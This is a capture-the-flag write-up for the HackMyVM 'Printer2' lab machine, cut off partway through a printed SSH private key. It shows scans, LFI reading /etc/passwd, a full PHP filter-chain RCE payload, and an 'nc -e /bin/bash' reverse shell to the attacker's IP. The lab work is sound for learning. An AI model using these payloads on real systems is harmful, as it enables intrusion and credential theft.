{"id":653,"date":"2024-04-28T17:52:04","date_gmt":"2024-04-28T09:52:04","guid":{"rendered":"http:\/\/162.14.82.114\/?p=653"},"modified":"2024-04-28T17:52:04","modified_gmt":"2024-04-28T09:52:04","slug":"hmv-_-printer2","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/653\/04\/28\/2024\/","title":{"rendered":"hmv[-_-]Printer2"},"content":{"rendered":"<h1>Printer2<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751129.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751129.png\" alt=\"image-20240427161735717\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751130.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751130.png\" alt=\"image-20240428165920566\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Reconnaissance<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/printer2]\n\u2514\u2500$ rustscan -a 192.168.0.181 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.0.181:22\nOpen 192.168.0.181:80\nOpen 192.168.0.181:631\n\nPORT    STATE SERVICE REASON  VERSION\n22\/tcp  open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQGwzNlaaGEELNmSaaA5KPNGnxOCBP8oa7QB1kl8hkIrIGanBlB8e+lifNATIlUM57ReHEaoIiJMZLQlMTATjzQ3g76UxpkRMSfFMfjOwBr3T9xAuggn11GkgapKzgQXop1xpVnpddudlA2DGT56xhfAefOoh9LV\/Sx5gw\/9sH+YpjYZNn4WYrfHuIcvObaa1jE7js8ySeIRQffj5n6wX\/eq7WbohB6yFcLb1PBvnfNhvqgyvwcCWiwZoNhRMa+0ANpdpZyOyKQcbR51w36rmgJI0Y9zLIyjHvtxiNuncns0KFvlnS3JXywv277OvJuqhH4ORvXM9kgSKebGV+\/5R0D\/kFmUA0Q4o1EEkpwzXiiUTLs6j4ZwNojp3iUVWT6Wb7BmnxjeQzG05LXkoavc63aNf+lcSh9mQsepQNo5aHlHzMefPx\/j2zbjQN8CHCxOPWLTcpFlyQSZjjnpGxwYiYyqUZ0sF8l9GWtj6eVgeScGvGy6e0YTPG9\/d6o2oWdMM=\n|   256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFwHzjIh47PVCBqaldJCFibsrsU4ERboGRj1+5RNyV5zFxNTNpdu8f\/rNL9s0p7zkqERtD2xb4zBIl6Vj9Fpdxw=\n|   256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOUM7hNt+CcfC4AKOuJumfdt3GCMSintNt9k0S2tA1XS\n80\/tcp  open  http    syn-ack Apache httpd 2.4.56 ((Debian))\n|_http-server-header: Apache\/2.4.56 (Debian)\n| http-methods: \n|_  Supported Methods: HEAD GET POST OPTIONS\n|_http-title: Free Website Templates\n631\/tcp open  ipp     syn-ack CUPS 2.3\n|_http-server-header: CUPS\/2.3 IPP\/2.1\n| http-robots.txt: 1 disallowed entry \n|_\/\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Home - CUPS 2.3.3op2\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/printer2]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.181\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x 
php,zip,bak,jpg,txt,html       \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.181\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak,jpg,txt,html,php,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 278]\n\/images               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.181\/images\/]\n\/.html                (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751131.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751131.png\" 
alt=\"image-20240428170133972\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>A quick search for known vulnerabilities turned up nothing, so take a look at the traffic:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751132.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751132.png\" alt=\"image-20240428170448447\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>There is a DNS name to resolve:<\/p>\n<pre><code class=\"language-apl\">192.168.0.181   printer4life.printer.hmv<\/code><\/pre>\n<p>Try enumerating its subdirectories:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/printer2]\n\u2514\u2500$ gobuster dir -u http:\/\/printer4life.printer.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html       \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/printer4life.printer.hmv\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:         
       \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak,jpg,txt,html,php,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 289]\n\/.html                (Status: 403) [Size: 289]\n\/index.php            (Status: 200) [Size: 365]\n\/logo                 (Status: 200) [Size: 77750]\n\/logo.jpg             (Status: 200) [Size: 77750]\n\/hp.php               (Status: 200) [Size: 27]\n\/hp.jpg               (Status: 200) [Size: 33673]\n\/hp                   (Status: 200) [Size: 33673]\n\/canon                (Status: 200) [Size: 101939]\n\/canon.jpg            (Status: 200) [Size: 101939]\n\/canon.php            (Status: 200) [Size: 30]\n\/epson.jpg            (Status: 200) [Size: 64020]\n\/epson                (Status: 200) [Size: 64020]\n\/epson.php            (Status: 200) [Size: 30]\n\/.php                 (Status: 403) [Size: 289]\n\/.html                (Status: 403) [Size: 289]\n\/server-status        (Status: 403) [Size: 289]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h3>LFI<\/h3>\n<p>See what else is there:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/printer2]\n\u2514\u2500# curl http:\/\/printer4life.printer.hmv\/\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n    &lt;title&gt;Printers&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;h1&gt;Select a printer&lt;\/h1&gt;\n    &lt;p&gt;I love printers so much ! 
I print every minute&lt;\/p&gt;\n    &lt;ul&gt;\n        &lt;li&gt;&lt;a href=&quot;index.php?page=hp&quot;&gt;HP&lt;\/a&gt;&lt;\/li&gt;\n        &lt;li&gt;&lt;a href=&quot;index.php?page=canon&quot;&gt;Canon&lt;\/a&gt;&lt;\/li&gt;\n        &lt;li&gt;&lt;a href=&quot;index.php?page=epson&quot;&gt;Epson&lt;\/a&gt;&lt;\/li&gt;\n    &lt;\/ul&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>This looks like an <code>LFI<\/code> vulnerability:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/printer2]\n\u2514\u2500# curl http:\/\/printer4life.printer.hmv\/index.php?page=..\/..\/..\/..\/..\/etc\/passwd\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n    &lt;title&gt;Printers&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;h1&gt;Select a printer&lt;\/h1&gt;\n    &lt;p&gt;I love printers so much ! I print every minute&lt;\/p&gt;\n    &lt;ul&gt;\n        &lt;li&gt;&lt;a href=&quot;index.php?page=hp&quot;&gt;HP&lt;\/a&gt;&lt;\/li&gt;\n        &lt;li&gt;&lt;a href=&quot;index.php?page=canon&quot;&gt;Canon&lt;\/a&gt;&lt;\/li&gt;\n        &lt;li&gt;&lt;a href=&quot;index.php?page=epson&quot;&gt;Epson&lt;\/a&gt;&lt;\/li&gt;\n    &lt;\/ul&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List 
Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\navahi-autoipd:x:105:113:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmabelle:x:1000:1000:,,,:\/home\/mabelle:\/bin\/bash\navahi:x:107:115:Avahi mDNS daemon,,,:\/run\/avahi-daemon:\/usr\/sbin\/nologin\nsaned:x:108:117::\/var\/lib\/saned:\/usr\/sbin\/nologin\ncolord:x:109:118:colord colour management daemon,,,:\/var\/lib\/colord:\/usr\/sbin\/nologin\nsalt:x:110:119::\/var\/lib\/salt:\/bin\/sh\n_rpc:x:111:65534::\/run\/rpcbind:\/usr\/sbin\/nologin\nkierra:x:1001:1002:,,,:\/home\/kierra:\/bin\/bash<\/code><\/pre>\n<p>Nice!!!!!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/printer2]\n\u2514\u2500# curl http:\/\/printer4life.printer.hmv\/index.php?page=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n    &lt;title&gt;Printers&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;h1&gt;Select a printer&lt;\/h1&gt;\n    &lt;p&gt;I love printers so much ! 
I print every minute&lt;\/p&gt;\n    &lt;ul&gt;\n        &lt;li&gt;&lt;a href=&quot;index.php?page=hp&quot;&gt;HP&lt;\/a&gt;&lt;\/li&gt;\n        &lt;li&gt;&lt;a href=&quot;index.php?page=canon&quot;&gt;Canon&lt;\/a&gt;&lt;\/li&gt;\n        &lt;li&gt;&lt;a href=&quot;index.php?page=epson&quot;&gt;Epson&lt;\/a&gt;&lt;\/li&gt;\n    &lt;\/ul&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n<\/code><\/pre>\n<p>The PHP pseudo-protocol (stream wrapper) can be used for reading and writing, so try building a PHP filter chain for command execution!<\/p>\n<pre><code class=\"language-bash\">python3 php_filter_chain_generator.py --chain &#039;&lt;?=`$_GET[0]` ?&gt;&#039;\n[+] The following gadget chain will generate the following code : &lt;?=`$_GET[0]` ?&gt; (base64 value: PD89YCRfR0VUWzBdYCA\/Pg)\nphp:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|conver
t.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|c
onvert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp<\/code><\/pre>\n<p>Try to get a reverse shell!!!!<\/p>\n<pre><code class=\"language-bash\">http:\/\/printer4life.printer.hmv\/index.php?page=php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-d
ecode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&amp;0=whoami<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751133.png'><img class=\"lazyload lazyload-style-2\" 
decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751133.png\" alt=\"image-20240428171727985\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Command execution works, so get a reverse shell!!!!<\/p>\n<pre><code class=\"language-bash\">http:\/\/printer4life.printer.hmv\/index.php?page=payload&amp;0=nc+-e+\/bin\/bash+192.168.0.143+1234<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751134.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751134.png\" alt=\"image-20240428171915669\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@printer.hmv:\/var\/www\/printer4life$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. 
It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@printer.hmv:\/var\/www\/printer4life$ cat \/etc\/passwd | grep &quot;bash&quot;\nroot:x:0:0:root:\/root:\/bin\/bash\nmabelle:x:1000:1000:,,,:\/home\/mabelle:\/bin\/bash\nkierra:x:1001:1002:,,,:\/home\/kierra:\/bin\/bash\n(remote) www-data@printer.hmv:\/var\/www\/printer4life$ cd \/home\n(remote) www-data@printer.hmv:\/home$ ls\nkierra  mabelle\n(remote) www-data@printer.hmv:\/home$ cd kierra\/\n(remote) www-data@printer.hmv:\/home\/kierra$ ls -la\ntotal 24\ndrwxr-xr-x 2 kierra kierra 4096 Apr 22  2023 .\ndrwxr-xr-x 4 root   root   4096 Apr 22  2023 ..\nlrwxrwxrwx 1 root   root      9 Apr 22  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 kierra kierra  220 Apr 22  2023 .bash_logout\n-rw-r--r-- 1 kierra kierra 3526 Apr 22  2023 .bashrc\n-rw-r--r-- 1 kierra kierra  807 Apr 22  2023 .profile\n-rwx------ 1 kierra kierra   33 Apr 22  2023 user.txt\n(remote) www-data@printer.hmv:\/home\/kierra$ cat user.txt \ncat: user.txt: Permission denied\n(remote) www-data@printer.hmv:\/home\/kierra$ cd ..\/mabelle\/\n(remote) www-data@printer.hmv:\/home\/mabelle$ ls -la\ntotal 32\ndrwxr-xr-x 4 mabelle mabelle 4096 May 20  2023 .\ndrwxr-xr-x 4 root    root    4096 Apr 22  2023 ..\nlrwxrwxrwx 1 root    root       9 Apr 14  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 mabelle mabelle  220 Apr 14  2023 .bash_logout\n-rw-r--r-- 1 mabelle mabelle 3526 Apr 14  2023 .bashrc\ndrwxr-xr-x 3 mabelle mabelle 4096 May 20  2023 .local\n-rw-r--r-- 1 mabelle mabelle  807 Apr 14  2023 .profile\ndrwx------ 2 mabelle mabelle 4096 Apr 22  2023 .ssh\n-rw-r--r-- 1 mabelle mabelle 2602 Apr 22  2023 mabelle_private_ssh_key\n(remote) www-data@printer.hmv:\/home\/mabelle$ cat mabelle_private_ssh_key \n-----BEGIN OPENSSH PRIVATE 
KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAsMI4Mddj7c6DmNM3BjMN2wlxX4VArJvNMpnR1ajE+cmrVQueoRDj\nxUaEnFZbJrlWHJbDFHCr\/dusXroIkqYbyq0NgOK4lQcWjKC\/kg6E3OBumzdfmnyiwsF\/58\ncMc70pG2frbQu6q29pKqyihtAtDV6xq827uMDuJve+ohUs8akybrf9dunLr2iabxRT4CF1\n7NfQCY4S2iQvHgF3pKgDXoS7w+q4s60dd0Ka76MvsxUGFULOMp4QUL0SMMC1NEUuWhYMqC\nlSGX0NwwTmr1INDFaNOROoPitfSi06E\/ckTC6xd3Se8xxLhWV4JtCo1b5Rv4riE2JhBtS\/\nSqhDEXixbML3l6eK5jZOxNnIAD9863ZXHLSx9hN8v\/yzlXJHYyjji37Te4yX73O+5iZE1V\n\/SeZlQ1Gf56+JZWqQSaLd48lI23ajJX3RIwXkOMJOg93cF6u8h9RQlrFtBqSy5UaAYe9OF\n3BNFvlnaDIEC7RXkmagSKBaRDjOdMNoGw7D4I3hlAAAFiOlYdG7pWHRuAAAAB3NzaC1yc2\nEAAAGBALDCODHXY+3Og5jTNwYzDdsJcV+FQKybzTKZ0dWoxPnJq1ULnqEQ48VGhJxWWya5\nVhyWwxRwq\/3brF66CJKmG8qtDYDiuJUHFoygv5IOhNzgbps3X5p8osLBf+fHDHO9KRtn62\n0LuqtvaSqsoobQLQ1esavNu7jA7ib3vqIVLPGpMm63\/Xbpy69omm8UU+AhdezX0AmOEtok\nLx4Bd6SoA16Eu8PquLOtHXdCmu+jL7MVBhVCzjKeEFC9EjDAtTRFLloWDKgpUhl9DcME5q\n9SDQxWjTkTqD4rX0otOhP3JEwusXd0nvMcS4VleCbQqNW+Ub+K4hNiYQbUv0qoQxF4sWzC\n95eniuY2TsTZyAA\/fOt2Vxy0sfYTfL\/8s5VyR2Mo44t+03uMl+9zvuYmRNVf0nmZUNRn+e\nviWVqkEmi3ePJSNt2oyV90SMF5DjCToPd3BervIfUUJaxbQaksuVGgGHvThdwTRb5Z2gyB\nAu0V5JmoEigWkQ4znTDaBsOw+CN4ZQAAAAMBAAEAAAGAOr4RFt9SInIDYgKvwqus6yJUPz\n51o+eTZkGgbrVL4QeYnQbjjPuj9qfc4mgAmvn1GEMySdS4FAGxYznIJ5R0oAKq\/i5a0Ywt\nfkbd45hXp2A